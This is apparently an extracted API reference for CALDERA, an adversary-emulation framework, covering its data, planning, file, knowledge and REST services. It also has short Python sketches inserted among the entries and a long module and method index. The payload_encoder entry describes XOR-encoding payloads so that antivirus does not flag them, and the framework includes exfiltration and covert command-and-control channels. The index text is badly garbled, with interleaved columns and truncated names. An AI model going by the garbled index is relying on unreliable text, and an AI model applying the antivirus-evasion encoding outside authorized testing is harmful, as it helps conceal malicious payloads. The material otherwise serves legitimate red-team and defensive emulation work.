async register_tunnel(tunnel)
app.service.contact_svc.report(func)
app.service.data_svc module
class app.service.data_svc.DataService
Bases: DataServiceInterface, BaseService
async apply(collection)
Add a new collection to RAM
Parameters
collection –
Returns
async convert_v0_ability_executor(ability_data: dict)
Checks if ability file follows v0 executor format, otherwise assumes v1 ability formatting.
async convert_v0_ability_requirements(requirements_data: list)
Checks if ability file follows v0 requirement format, otherwise assumes v1 ability formatting.
convert_v0_ability_technique_id(ability_data: dict)
Checks if ability file follows v0 technique_id format, otherwise assumes v1 ability formatting.
convert_v0_ability_technique_name(ability_data: dict)
Checks if ability file follows v0 technique_name format, otherwise assumes v1 ability formatting.
async create_or_update_everything_adversary()
async load_data(plugins=())
Non-blocking read of all the data sources to populate the object store
Returns
None
async load_executors_from_list(executors: list)
async load_executors_from_platform_dict(platforms)
async locate(object_name, match=None)
Find all c_objects which match a search
Parameters
• object_name –
• match – dict()
Returns
a list of c_object types
async reload_data(plugins=())
Blocking read of all the data sources to populate the object store
Returns
None
async remove(object_name, match)
Remove any c_objects which match a search
Parameters
• object_name –
• match – dict()
Returns
async restore_state()
Restore the object database
Returns
async save_state()
Save stored data to disk :return:
async search(value, object_name)
async store(c_object)
Accept any c_object type and store it (create/update) in RAM
Parameters
c_object –
Returns
a single c_object
app.service.event_svc module
class app.service.event_svc.EventService
Bases: EventServiceInterface, BaseService
async fire_event(exchange=None, queue=None, timestamp=True, **callback_kwargs)
Fire an event :param event: The event topic and (optional) subtopic, separated by a ‘/’ :param
callback_kwargs: Any additional parameters to pass to the event handler :return: None
async handle_exceptions(awaitable)
app.service.file_svc module
class app.service.file_svc.FileSvc
Bases: FileServiceInterface, BaseService
async add_special_payload(name, func)
Call a special function when specific payloads are downloaded
Parameters
• name –
• func –
Returns
static add_xored_extension(filename)
async create_exfil_sub_directory(dir_name)
get_payload_packer(packer)
static is_extension_xored(filename)
list_exfilled_files(startdir=None)
app.service.knowledge_svc module
class app.service.knowledge_svc.KnowledgeService
Bases: KnowledgeServiceInterface, BaseService
async add_fact(fact, constraints=None)
Add a fact to the internal store
Parameters
• fact – Fact to add
• constraints – any potential constraints
async add_relationship(relationship, constraints=None)
Add a relationship to the internal store
Parameters
• relationship – Relationship object to add
• constraints – optional constraints on the use of the relationship
async add_rule(rule, constraints=None)
Add a rule to the internal store
Parameters
• rule – Rule object to add
• constraints – dictionary containing fields to match on
app.service.learning_svc module
class app.service.learning_svc.LearningService
Bases: LearningServiceInterface, BaseService
static add_parsers(directory)
async build_model()
The model is a static set of all variables used inside all ability commands. This can be used to determine
which facts - when found together - are more likely to be used together :return:
async learn(facts, link, blob, operation=None)
app.service.planning_svc module
class app.service.planning_svc.PlanningService(global_variable_owners=None)
Bases: PlanningServiceInterface, BasePlanningService
async add_ability_to_bucket(ability, bucket)
Adds bucket tag to ability
Parameters
• ability (Ability) – Ability to add bucket to
• bucket (string) – Bucket to add to ability
async exhaust_bucket(planner, bucket, operation, agent=None, batch=False, condition_stop=True)
Apply all links for specified bucket. Blocks until all links are completed, either after batch push, or
separately for every pushed link.
Parameters
• planner (LogicalPlanner) – Planner to check for stopping conditions on
• bucket (string) – Bucket to pull abilities from
• operation (Operation) – Operation to run links on
• agent (Agent, optional) – Agent to run links on, defaults to None
• batch (bool, optional) – Push all bucket links immediately. Will check if operation
has been stopped (by user) after all bucket links complete. ‘False’ will push links one at
a time, and wait for each to complete. Will check if operation has been stopped (by user)
after each single link is completed. Defaults to False
• condition_stop (bool, optional) – Enable stopping of execution if stopping
conditions are met. If set to False, the bucket will continue execution even if stopping conditions
are met. Defaults to True
async generate_and_trim_links(agent, operation, abilities, trim=True)
Generate new links based on abilities
Creates new links based on given operation, agent, and abilities. Optionally, trim links using trim_links()
to return only valid links with completed facts.
Parameters
• operation (Operation) – Operation to generate links on
• agent (Agent) – Agent to generate links on
• abilities (list(Ability)) – Abilities to generate links for
• trim (bool, optional) – call trim_links() on list of links before returning, defaults to
True
Returns
A list of links
Return type
list(Links)
async get_cleanup_links(operation, agent=None)
Generate cleanup links
Generates cleanup links for given operation and agent. If no agent is provided, cleanup links will be
generated for all agents in an operation.
Parameters
• operation (Operation) – Operation to generate links on
• agent (Agent, optional) – Agent to generate links on, defaults to None
Returns
A list of links
async get_links(operation, buckets=None, agent=None, trim=True)
Generate links for use in an operation
For an operation and agent combination, create links (that can be executed). When no agent is supplied,
links for all agents are returned.
Parameters
• operation (Operation) – Operation to generate links for
• buckets (list(string), optional) – Buckets to pull abilities from. If None, get links for all abilities, defaults to None
• agent (Agent, optional) – Agent to generate links for, defaults to None
• trim (bool, optional) – call trim_links() on list of links before returning, defaults to True
Returns
A list of links
app.service.rest_svc module
class app.service.rest_svc.RestService
Bases: RestServiceInterface, BaseService
async add_manual_command(access, data)
async apply_potential_link(link)
async build_potential_abilities(operation)
async construct_agents_for_group(group)
async delete_ability(data)
async delete_adversary(data)
async delete_agent(data)
async delete_operation(data)
async display_operation_report(data)
async display_result(data)
async download_contact_report(contact)
async find_abilities(paw)
async get_agent_configuration(data)
async get_link_pin(json_data)
async list_exfil_files(data)
async list_payloads()
async update_agent_data(data)
async update_chain_data(data)
async update_config(data)
async update_planner(data)
Update an existing planner, from either the GUI or REST API, with new stopping conditions. This overwrites the existing YML file.
Parameters
• data – planner data
Returns
the ID of the updated planner
app.utility namespace
Submodules
app.utility.base_knowledge_svc module
class app.utility.base_knowledge_svc.BaseKnowledgeService
Bases: BaseService
app.utility.base_obfuscator module
class app.utility.base_obfuscator.BaseObfuscator(agent)
Bases: BaseWorld
run(link, **kwargs)
app.utility.base_object module
class app.utility.base_object.AppConfigGlobalVariableIdentifier
Bases: object
classmethod is_global_variable(variable)
class app.utility.base_object.BaseObject
Bases: BaseWorld
property access
static clean(d)
property created
property display
display_schema = None
static hash(s)
classmethod load(dict_obj)
load_schema = None
match(criteria)
replace_app_props(encoded_string)
schema = None
search_tags(value)
update(field, value)
Updates the given field to the given value as long as the value is not None and the new value is different
from the current value. Ignoring None prevents current property values from being overwritten to None if
the given property is not intentionally passed back to be updated (example: Agent heartbeat)
Parameters
• field – object property to update
• value – value to update to
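The update() guard described above can be sketched as follows (a simplified stand-in, not the real BaseObject, with hypothetical field names):

```python
class BaseObjectSketch:
    """Illustrates BaseObject.update(): None and unchanged values are ignored."""
    def __init__(self):
        self.paw = 'abc123'
        self.trusted = True

    def update(self, field, value):
        # Only overwrite when a real, different value was supplied; this is
        # why a heartbeat that omits a property cannot null it out
        if value is not None and value != getattr(self, field):
            setattr(self, field, value)

agent = BaseObjectSketch()
agent.update('trusted', None)   # ignored: None never clobbers a value
agent.update('trusted', False)  # applied: the new value differs
print(agent.trusted)            # False
```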
app.utility.base_parser module
class app.utility.base_parser.BaseParser(parser_info)
Bases: object
static broadcastip(blob)
static email(blob)
Parse out email addresses from a blob of text
static filename(blob)
Parse out filenames from a blob of text
static ip(blob)
static line(blob)
Split a blob of text by line
static load_json(blob)
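The parser helpers above can be approximated with simple regexes. These patterns are illustrative assumptions, not CALDERA's exact ones:

```python
import json
import re

def email(blob):
    # Pull anything shaped like an email address out of raw command output
    return re.findall(r'[\w.+-]+@[\w-]+\.[\w.-]+', blob)

def ip(blob):
    # Naive IPv4 matcher; the real parser may validate octet ranges
    return re.findall(r'\b(?:\d{1,3}\.){3}\d{1,3}\b', blob)

def line(blob):
    # Split a blob into non-empty lines
    return [x for x in blob.strip().splitlines() if x]

def load_json(blob):
    return json.loads(blob)

output = 'admin@example.com logged in from 10.0.0.5\nok'
print(email(output))  # ['admin@example.com']
print(ip(output))     # ['10.0.0.5']
print(line(output))   # ['admin@example.com logged in from 10.0.0.5', 'ok']
```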
app.utility.base_planning_svc module
class app.utility.base_planning_svc.BasePlanningService(global_variable_owners=None)
Bases: BaseService
add_global_variable_owner(global_variable_owner)
Adds a global variable owner to the internal registry.
These will be used for identification of global variables when performing variable-fact substitution.
Parameters
• global_variable_owner – An object that exposes an is_global_variable(...) method and accepts a string containing a bare/unwrapped variable
async add_test_variants(links, agent, facts=(), rules=(), operation=None, trim_unset_variables=False, trim_missing_requirements=False)
Create a list of all possible links for a given set of templates
Parameters
• links –
• agent –
• facts –
• rules –
• operation –
• trim_unset_variables –
• trim_missing_requirements –
Returns
updated list of links
is_global_variable(variable)
re_index = re.compile('(?<=\\[filters\\().+?(?=\\)\\])')
re_limited = re.compile('#{.*\\[*\\]}')
re_trait = re.compile('(?<=\\{).+?(?=\\[)')
async trim_links(operation, links, agent)
Trim links in the supplied list: add all possible test variants, remove completed links, and remove links whose template fact variables could not be replaced by fact values
Parameters
• operation –
• links –
• agent –
Returns
trimmed list of links
app.utility.base_service module
class app.utility.base_service.BaseService
Bases: BaseWorld
add_service(name, svc)
classmethod get_service(name)
classmethod get_services()
classmethod remove_service(name)
app.utility.base_world module
class app.utility.base_world.BaseWorld
Bases: object
A collection of base static functions for service & object module usage
class Access(value)
Bases: Enum
An enumeration.
APP = 0
BLUE = 2
HIDDEN = 3
RED = 1
class Privileges(value)
Bases: Enum
An enumeration.
Elevated = 1
User = 0
TIME_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
static check_requirement(params)
static clear_config()
static create_logger(name)
static encode_string(s)
static generate_name(size=16)
static generate_number(size=6)
static get_current_timestamp(date_format='%Y-%m-%dT%H:%M:%SZ')
static is_base64(s)
static is_uuid4(s)
static jitter(fraction)
re_base64 = re.compile('[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}', re.DOTALL)
static strip_yml(path)
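For example, timestamps built with TIME_FORMAT are UTC ISO-8601 strings with a trailing Z. A sketch of what get_current_timestamp() plausibly returns (the UTC assumption follows from the Z suffix, not from the source shown here):

```python
from datetime import datetime, timezone

TIME_FORMAT = '%Y-%m-%dT%H:%M:%SZ'

def get_current_timestamp(date_format=TIME_FORMAT):
    # Assumption: times are recorded in UTC, matching the literal 'Z' suffix
    return datetime.now(timezone.utc).strftime(date_format)

stamp = get_current_timestamp()
print(stamp)  # e.g. 2024-01-01T12:00:00Z
```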
app.utility.config_generator module
app.utility.config_generator.ensure_local_config()
Checks if a local.yml config file exists. If not, generates a new local.yml file using secure random values.
app.utility.config_generator.log_config_message(config_path)
app.utility.config_generator.make_secure_config()
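Generating such secure random values is straightforward with the standard library. The key names and value shapes below are assumptions for illustration, not CALDERA's exact local.yml schema:

```python
import secrets

def make_secure_values():
    # Hypothetical subset of a local.yml: credentials generated fresh on
    # first start so a default install never ships shared secrets
    return {
        'api_key_red': secrets.token_urlsafe(32),
        'api_key_blue': secrets.token_urlsafe(32),
        'crypt_salt': secrets.token_urlsafe(16),
        'encryption_key': secrets.token_urlsafe(32),
    }

config = make_secure_values()
print(sorted(config))
```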
app.utility.file_decryptor module
app.utility.file_decryptor.get_encryptor(salt, key)
app.utility.file_decryptor.read(filename, encryptor)
app.utility.payload_encoder module
This module contains helper functions for encoding and decoding payload files.
If AV is running on the server host, then it may sometimes flag, quarantine, or delete CALDERA payloads. To help
prevent this, encoded payloads can be used to prevent AV from breaking the server. The convention expected by the
server is that encoded payloads will be XOR’ed with the DEFAULT_KEY contained in the payload_encoder.py module.
Additionally, payload_encoder.py can be used from the command-line to add a new encoded payload.
python /path/to/payload_encoder.py input_file output_file
NOTE: In order for the server to detect the availability of an encoded payload, the payload file’s name must end in the
.xored extension.
app.utility.payload_encoder.xor_bytes(in_bytes, key=None)
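A sketch of that XOR convention follows. DEFAULT_KEY here is a placeholder; the real key lives in payload_encoder.py:

```python
from itertools import cycle

DEFAULT_KEY = b'placeholder-key'  # assumption: the real module defines its own

def xor_bytes(in_bytes, key=None):
    # XOR with a repeating key; applying it twice restores the original,
    # so the same function both encodes and decodes a .xored payload
    key = key or DEFAULT_KEY
    return bytes(b ^ k for b, k in zip(in_bytes, cycle(key)))

payload = b'MZ\x90\x00fake-payload'
encoded = xor_bytes(payload)
assert xor_bytes(encoded) == payload  # round-trip recovers the payload
print(len(encoded) == len(payload))  # True
```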
app.utility.rule_set module
class app.utility.rule_set.RuleAction(value)
Bases: Enum
An enumeration.
ALLOW = 1
DENY = 0
class app.utility.rule_set.RuleSet(rules)
Bases: object
async apply_rules(facts)
async is_fact_allowed(fact)
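Rule application can be sketched as an allow/deny filter over facts. This is a simplification under the assumption that the last matching rule wins and '*' matches any value; the real RuleSet matches traits and wildcard values against Fact objects:

```python
from enum import Enum

class RuleAction(Enum):
    DENY = 0
    ALLOW = 1

def is_fact_allowed(fact, rules):
    """Facts with no matching rule pass through; otherwise last match wins."""
    trait, value = fact
    allowed = True
    for action, r_trait, r_value in rules:
        if r_trait == trait and r_value in ('*', value):
            allowed = (action == RuleAction.ALLOW)
    return allowed

rules = [
    (RuleAction.DENY, 'remote.host.ip', '*'),          # block all IPs...
    (RuleAction.ALLOW, 'remote.host.ip', '10.0.0.5'),  # ...except one
]
print(is_fact_allowed(('remote.host.ip', '10.0.0.5'), rules))  # True
print(is_fact_allowed(('remote.host.ip', '10.0.0.9'), rules))  # False
```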
app.version module
app.version.get_version()
caldera
a app.api.v2.schemas.config_schemas, 150
app, 212 app.api.v2.schemas.deploy_command_schemas,
app.api, 139 150
app.api.packs, 139 app.api.v2.schemas.error_schemas, 151
app.api.packs.advanced, 139 app.api.v2.security, 153
app.api.packs.campaign, 139 app.api.v2.validation, 153
app.api.rest_api, 153 app.contacts, 154
app.api.v2, 153 app.contacts.contact_dns, 156
app.api.v2.errors, 152 app.contacts.contact_ftp, 159
app.api.v2.handlers, 139 app.contacts.contact_gist, 160
app.api.v2.handlers.ability_api, 140 app.contacts.contact_html, 160
app.api.v2.handlers.adversary_api, 140 app.contacts.contact_http, 161
app.api.v2.handlers.agent_api, 140 app.contacts.contact_slack, 161
app.api.v2.handlers.base_api, 141 app.contacts.contact_tcp, 161
app.api.v2.handlers.base_object_api, 141 app.contacts.contact_udp, 162
app.api.v2.handlers.config_api, 142 app.contacts.contact_websocket, 162
app.api.v2.handlers.contact_api, 142 app.contacts.handles, 154
app.api.v2.handlers.fact_api, 142 app.contacts.handles.h_beacon, 154
app.api.v2.handlers.fact_source_api, 143 app.contacts.tunnels, 154
app.api.v2.handlers.health_api, 143 app.contacts.tunnels.tunnel_ssh, 154
app.api.v2.handlers.obfuscator_api, 143 app.data_encoders, 162
app.api.v2.handlers.objective_api, 143 app.data_encoders.base64_basic, 162
app.api.v2.handlers.operation_api, 144 app.data_encoders.plain_text, 163
app.api.v2.handlers.planner_api, 144 app.learning, 163
app.api.v2.handlers.plugins_api, 145 app.learning.p_ip, 163
app.api.v2.handlers.schedule_api, 145 app.learning.p_path, 163
app.api.v2.managers, 145 app.objects, 163
app.api.v2.managers.ability_api_manager, 145 app.objects.c_ability, 173
app.api.v2.managers.adversary_api_manager, app.objects.c_adversary, 175
146 app.objects.c_agent, 175
app.api.v2.managers.agent_api_manager, 146 app.objects.c_data_encoder, 177
app.api.v2.managers.base_api_manager, 146 app.objects.c_obfuscator, 178
app.api.v2.managers.config_api_manager, 147 app.objects.c_objective, 178
app.api.v2.managers.contact_api_manager, 147 app.objects.c_operation, 179
app.api.v2.managers.fact_api_manager, 147 app.objects.c_planner, 181
app.api.v2.managers.operation_api_manager, app.objects.c_plugin, 182
148 app.objects.c_schedule, 182
app.api.v2.managers.schedule_api_manager, 148 app.objects.c_source, 183
app.api.v2.responses, 152 app.objects.interfaces, 163
app.api.v2.schemas, 149 app.objects.interfaces.i_object, 163
app.api.v2.schemas.base_schemas, 149 app.objects.secondclass, 164
app.api.v2.schemas.caldera_info_schemas, 149 app.objects.secondclass.c_executor, 164
215
caldera
app.objects.secondclass.c_fact, 165
app.objects.secondclass.c_goal, 166
app.objects.secondclass.c_instruction, 166
app.objects.secondclass.c_link, 167
app.objects.secondclass.c_parser, 168
app.objects.secondclass.c_parserconfig, 169
app.objects.secondclass.c_relationship, 169
app.objects.secondclass.c_requirement, 171
app.objects.secondclass.c_result, 171
app.objects.secondclass.c_rule, 172
app.objects.secondclass.c_variation, 172
app.objects.secondclass.c_visibility, 173
app.service, 184
app.service.app_svc, 192
app.service.auth_svc, 193
app.service.contact_svc, 195
app.service.data_svc, 196
app.service.event_svc, 197
app.service.file_svc, 198
app.service.interfaces, 184
app.service.interfaces.i_app_svc, 184
app.service.interfaces.i_auth_svc, 185
app.service.interfaces.i_contact_svc, 185
app.service.interfaces.i_data_svc, 185
app.service.interfaces.i_event_svc, 186
app.service.interfaces.i_file_svc, 187
app.service.interfaces.i_knowledge_svc, 187
app.service.interfaces.i_learning_svc, 189
app.service.interfaces.i_login_handler, 190
app.service.interfaces.i_object_svc, 190
app.service.interfaces.i_planning_svc, 190
app.service.interfaces.i_rest_svc, 191
app.service.knowledge_svc, 199
app.service.learning_svc, 201
app.service.login_handlers, 192
app.service.login_handlers.default, 192
app.service.planning_svc, 201
app.service.rest_svc, 205
app.utility, 206
app.utility.base_knowledge_svc, 206
app.utility.base_obfuscator, 206
app.utility.base_object, 206
app.utility.base_parser, 207
app.utility.base_planning_svc, 208
app.utility.base_service, 209
app.utility.base_world, 209
app.utility.config_generator, 211
app.utility.file_decryptor, 211
app.utility.payload_encoder, 211
app.utility.rule_set, 212
app.version, 212
A add_global_variable_owner()
A (app.contacts.contact_dns.DnsRecordType attribute), (app.utility.base_planning_svc.BasePlanningService
157 method), 208
AAAA (app.contacts.contact_dns.DnsRecordType at- add_link() (app.objects.c_operation.Operation
tribute), 157 method), 179
Ability (class in app.objects.c_ability), 173 add_manual_command()
ability_id (app.objects.c_source.Adjustment prop- (app.service.rest_svc.RestService method),
erty), 183 205
AbilityApi (class in app.api.v2.handlers.ability_api), add_parsers() (app.service.interfaces.i_learning_svc.LearningServiceInt
140 static method), 189
AbilityApiManager (class in add_parsers() (app.service.learning_svc.LearningService
app.api.v2.managers.ability_api_manager), static method), 201
145 add_relationship() (app.service.interfaces.i_knowledge_svc.Knowledge
AbilitySchema (class in app.objects.c_ability), 174 method), 188
accept() (app.contacts.contact_tcp.TcpSessionHandler add_relationship() (app.service.knowledge_svc.KnowledgeService
method), 162 method), 199
access (app.utility.base_object.BaseObject property), add_relationships()
206 (app.api.v2.handlers.fact_api.FactApi method),
AccessSchema (class in app.utility.base_world), 209 142
active_agents() (app.objects.c_operation.Operation add_routes() (app.api.v2.handlers.ability_api.AbilityApi
method), 179 method), 140
add_ability_to_bucket() add_routes() (app.api.v2.handlers.adversary_api.AdversaryApi
(app.service.planning_svc.PlanningService method), 140
method), 201 add_routes() (app.api.v2.handlers.agent_api.AgentApi
add_bucket() (app.objects.c_ability.Ability method), method), 140
173 add_routes() (app.api.v2.handlers.base_api.BaseApi
add_chunk() (app.contacts.contact_dns.Handler.TunneledMessage method), 141
method), 158 add_routes() (app.api.v2.handlers.base_object_api.BaseObjectApi
add_chunk() (app.contacts.contact_gist.Contact.GistUpload method), 141
method), 160 add_routes() (app.api.v2.handlers.config_api.ConfigApi
add_chunk() (app.contacts.contact_slack.Contact.SlackUpload method), 142
method), 161 add_routes() (app.api.v2.handlers.contact_api.ContactApi
add_executor() (app.objects.c_ability.Ability method), method), 142
173 add_routes() (app.api.v2.handlers.fact_api.FactApi
add_executors() (app.objects.c_ability.Ability method), 142
method), 173 add_routes() (app.api.v2.handlers.fact_source_api.FactSourceApi
method), 143
add_fact() (app.service.interfaces.i_knowledge_svc.KnowledgeServiceInterface
method), 187 add_routes() (app.api.v2.handlers.health_api.HealthApi
add_fact() (app.service.knowledge_svc.KnowledgeService method), 143
method), 199 add_routes() (app.api.v2.handlers.obfuscator_api.ObfuscatorApi
add_facts() (app.api.v2.handlers.fact_api.FactApi method), 143
method), 142 add_routes() (app.api.v2.handlers.objective_api.ObjectiveApi
217
caldera
218 Index
caldera
app.api.v2.handlers.schedule_api app.contacts.contact_tcp
module, 145 module, 161
app.api.v2.managers app.contacts.contact_udp
module, 145 module, 162
app.api.v2.managers.ability_api_manager app.contacts.contact_websocket
module, 145 module, 162
app.api.v2.managers.adversary_api_manager app.contacts.handles
module, 146 module, 154
app.api.v2.managers.agent_api_manager app.contacts.handles.h_beacon
module, 146 module, 154
app.api.v2.managers.base_api_manager app.contacts.tunnels
module, 146 module, 154
app.api.v2.managers.config_api_manager app.contacts.tunnels.tunnel_ssh
module, 147 module, 154
app.api.v2.managers.contact_api_manager app.data_encoders
module, 147 module, 162
app.api.v2.managers.fact_api_manager app.data_encoders.base64_basic
module, 147 module, 162
app.api.v2.managers.operation_api_manager app.data_encoders.plain_text
module, 148 module, 163
app.api.v2.managers.schedule_api_manager app.learning
module, 148 module, 163
app.api.v2.responses app.learning.p_ip
module, 152 module, 163
app.api.v2.schemas app.learning.p_path
module, 149 module, 163
app.api.v2.schemas.base_schemas app.objects
module, 149 module, 163
app.api.v2.schemas.caldera_info_schemas app.objects.c_ability
module, 149 module, 173
app.api.v2.schemas.config_schemas app.objects.c_adversary
module, 150 module, 175
app.api.v2.schemas.deploy_command_schemas app.objects.c_agent
module, 150 module, 175
app.api.v2.schemas.error_schemas app.objects.c_data_encoder
module, 151 module, 177
app.api.v2.security app.objects.c_obfuscator
module, 153 module, 178
app.api.v2.validation app.objects.c_objective
module, 153 module, 178
app.contacts app.objects.c_operation
module, 154 module, 179
app.contacts.contact_dns app.objects.c_planner
module, 156 module, 181
app.contacts.contact_ftp app.objects.c_plugin
module, 159 module, 182
app.contacts.contact_gist app.objects.c_schedule
module, 160 module, 182
app.contacts.contact_html app.objects.c_source
module, 160 module, 183
app.contacts.contact_http app.objects.interfaces
module, 161 module, 163
app.contacts.contact_slack app.objects.interfaces.i_object
module, 161 module, 163
Index 219
caldera
app.objects.secondclass app.service.interfaces.i_file_svc
module, 164 module, 187
app.objects.secondclass.c_executor app.service.interfaces.i_knowledge_svc
module, 164 module, 187
app.objects.secondclass.c_fact app.service.interfaces.i_learning_svc
module, 165 module, 189
app.objects.secondclass.c_goal app.service.interfaces.i_login_handler
module, 166 module, 190
app.objects.secondclass.c_instruction app.service.interfaces.i_object_svc
module, 166 module, 190
app.objects.secondclass.c_link app.service.interfaces.i_planning_svc
module, 167 module, 190
app.objects.secondclass.c_parser app.service.interfaces.i_rest_svc
module, 168 module, 191
app.objects.secondclass.c_parserconfig app.service.knowledge_svc
module, 169 module, 199
app.objects.secondclass.c_relationship app.service.learning_svc
module, 169 module, 201
app.objects.secondclass.c_requirement app.service.login_handlers
module, 171 module, 192
app.objects.secondclass.c_result app.service.login_handlers.default
module, 171 module, 192
app.objects.secondclass.c_rule app.service.planning_svc
module, 172 module, 201
app.objects.secondclass.c_variation app.service.rest_svc
module, 172 module, 205
app.objects.secondclass.c_visibility app.utility
module, 173 module, 206
app.service app.utility.base_knowledge_svc
module, 184 module, 206
app.service.app_svc app.utility.base_obfuscator
module, 192 module, 206
app.service.auth_svc app.utility.base_object
module, 193 module, 206
app.service.contact_svc app.utility.base_parser
module, 195 module, 207
app.service.data_svc app.utility.base_planning_svc
module, 196 module, 208
app.service.event_svc app.utility.base_service
module, 197 module, 209
app.service.file_svc app.utility.base_world
module, 198 module, 209
app.service.interfaces app.utility.config_generator
module, 184 module, 211
app.service.interfaces.i_app_svc app.utility.file_decryptor
module, 184 module, 211
app.service.interfaces.i_auth_svc app.utility.payload_encoder
module, 185 module, 211
app.service.interfaces.i_contact_svc app.utility.rule_set
module, 185 module, 212
app.service.interfaces.i_data_svc app.version
module, 185 module, 212
app.service.interfaces.i_event_svc AppConfigGlobalVariableIdentifier (class in
module, 186 app.utility.base_object), 206
220 Index
caldera
Index 221
caldera
build_model() (app.service.interfaces.i_learning_svc.LearningServiceInterface
can_ignore() (app.objects.secondclass.c_link.Link
method), 189 method), 167
build_model() (app.service.learning_svc.LearningServicecapabilities() (app.objects.c_agent.Agent method),
method), 201 176
build_obfuscator() (app.objects.c_obfuscator.ObfuscatorSchema
cede_control_to_planner()
method), 178 (app.objects.c_operation.Operation method),
build_objective() (app.objects.c_objective.ObjectiveSchema 180
method), 178 check_authorization() (in module
build_operation() (app.objects.c_operation.OperationSchema app.service.auth_svc), 195
method), 181 check_config() (app.contacts.contact_ftp.Contact
build_parser() (app.objects.secondclass.c_parser.ParserSchema method), 159
method), 168 check_edge_target()
build_parserconfig() (app.objects.secondclass.c_parserconfig.ParserConfigSchema
(app.objects.secondclass.c_parserconfig.ParserConfigSchema method), 169
method), 169 check_fact_exists()
build_planner() (app.objects.c_planner.PlannerSchema (app.service.interfaces.i_knowledge_svc.KnowledgeServiceInterfa
method), 181 method), 188
build_plugin() (app.objects.c_plugin.PluginSchema check_fact_exists()
method), 182 (app.service.knowledge_svc.KnowledgeService
build_potential_abilities() method), 199
(app.service.rest_svc.RestService method), check_not_empty_string() (in module
205 app.api.v2.validation), 153
build_potential_links() check_permissions()
(app.service.rest_svc.RestService method), (app.service.auth_svc.AuthService method),
205 194
build_relationship() check_permissions()
(app.objects.secondclass.c_relationship.RelationshipSchema(app.service.interfaces.i_auth_svc.AuthServiceInterface
method), 170 method), 185
build_requirement() check_positive_integer() (in module
(app.objects.secondclass.c_requirement.RequirementSchemaapp.api.v2.validation), 153
method), 171 check_repeatable_abilities()
build_result() (app.objects.secondclass.c_result.ResultSchema (app.objects.c_adversary.Adversary method),
method), 171 175
build_rule() (app.objects.secondclass.c_rule.RuleSchemacheck_requirement()
method), 172 (app.utility.base_world.BaseWorld static
build_schedule() (app.objects.c_schedule.ScheduleSchema method), 210
method), 183 check_stopping_conditions()
build_source() (app.objects.c_source.SourceSchema (app.service.planning_svc.PlanningService
method), 183 method), 201
build_variation() (app.objects.secondclass.c_variation.VariationSchema
clean() (app.utility.base_object.BaseObject static
method), 172 method), 206
build_visibility() (app.objects.secondclass.c_visibility.VisibilitySchema
CLEANUP (app.objects.c_operation.Operation.States at-
method), 173 tribute), 179
clear_config() (app.utility.base_world.BaseWorld
C static method), 210
calculate_sleep() (app.objects.c_agent.Agent close() (app.objects.c_operation.Operation method),
method), 176 180
CalderaInfoSchema (class in CNAME (app.contacts.contact_dns.DnsRecordType at-
app.api.v2.schemas.caldera_info_schemas), tribute), 157
149 command (app.objects.secondclass.c_variation.Variation
CalderaInfoSchema.Meta (class in property), 172
app.api.v2.schemas.caldera_info_schemas), compile_go() (app.service.file_svc.FileSvc method),
149 198
CampaignPack (class in app.api.packs.campaign), 139 compile_go() (app.service.interfaces.i_file_svc.FileServiceInterface
222 Index
caldera
Index 223
caldera
224 Index
caldera
Index 225
caldera
226 Index
caldera
Index 227
caldera
get_adversary_by_id() (app.api.v2.managers.agent_api_manager.AgentApiManager
(app.api.v2.handlers.adversary_api.AdversaryApi method), 146
method), 140 get_deploy_commands_for_ability()
get_agent() (app.api.v2.managers.operation_api_manager.OperationApiManager
(app.api.v2.handlers.agent_api.AgentApi
method), 148 method), 141
get_agent_by_id() (app.api.v2.handlers.agent_api.AgentApi get_encryptor() (in module
method), 140 app.utility.file_decryptor), 211
get_agent_configuration() get_fact_origin() (app.service.interfaces.i_knowledge_svc.KnowledgeS
(app.service.rest_svc.RestService method), method), 188
205 get_fact_origin() (app.service.knowledge_svc.KnowledgeService
get_agents() (app.api.v2.handlers.agent_api.AgentApi method), 200
method), 140 get_fact_source_by_id()
get_all_objects() (app.api.v2.handlers.base_object_api.BaseObjectApi
(app.api.v2.handlers.fact_source_api.FactSourceApi
method), 141 method), 143
get_available_contact_reports() get_fact_sources() (app.api.v2.handlers.fact_source_api.FactSourceAp
(app.api.v2.handlers.contact_api.ContactApi method), 143
method), 142 get_facts() (app.api.v2.handlers.fact_api.FactApi
get_available_contact_reports() method), 142
(app.api.v2.managers.contact_api_manager.ContactApiManager
get_facts() (app.service.interfaces.i_knowledge_svc.KnowledgeServiceIn
method), 147 method), 188
get_beacons() (app.contacts.contact_gist.Contact get_facts() (app.service.knowledge_svc.KnowledgeService
method), 160 method), 200
get_beacons() (app.contacts.contact_slack.Contact get_facts_by_operation_id()
method), 161 (app.api.v2.handlers.fact_api.FactApi method),
get_bytes() (app.contacts.contact_dns.DnsAnswerObj 142
method), 156 get_file() (app.service.file_svc.FileSvc method), 198
get_bytes() (app.contacts.contact_dns.DnsResponse get_file() (app.service.interfaces.i_file_svc.FileServiceInterface
method), 157 method), 187
get_cleanup_links() get_filtered_config()
(app.service.interfaces.i_planning_svc.PlanningServiceInterface
(app.api.v2.managers.config_api_manager.ConfigApiManager
method), 190 method), 147
get_cleanup_links() get_finished_states()
(app.service.planning_svc.PlanningService (app.objects.c_operation.Operation class
method), 203 method), 180
get_config() (app.utility.base_world.BaseWorld static get_health_info() (app.api.v2.handlers.health_api.HealthApi
method), 210 method), 143
get_config_with_name() get_link_pin() (app.service.interfaces.i_rest_svc.RestServiceInterface
(app.api.v2.handlers.config_api.ConfigApi method), 191
method), 142 get_link_pin() (app.service.rest_svc.RestService
get_contact() (app.service.contact_svc.ContactService method), 205
method), 195 get_links() (app.service.interfaces.i_planning_svc.PlanningServiceInter
get_contact_report() method), 190
(app.api.v2.handlers.contact_api.ContactApi get_links() (app.service.planning_svc.PlanningService
method), 142 method), 203
get_contact_report() get_loaded_plugins()
(app.api.v2.managers.contact_api_manager.ContactApiManager(app.service.app_svc.AppService method),
method), 147 192
get_current_timestamp() get_meta_facts() (app.service.interfaces.i_knowledge_svc.KnowledgeSe
(app.utility.base_world.BaseWorld static method), 189
method), 210 get_meta_facts() (app.service.knowledge_svc.KnowledgeService
get_deploy_commands() method), 200
(app.api.v2.handlers.agent_api.AgentApi get_obfuscator_by_name()
method), 140 (app.api.v2.handlers.obfuscator_api.ObfuscatorApi
get_deploy_commands() method), 143
228 Index
caldera
get_obfuscators() (app.api.v2.handlers.obfuscator_api.ObfuscatorApi
(app.service.interfaces.i_file_svc.FileServiceInterface
method), 143 method), 187
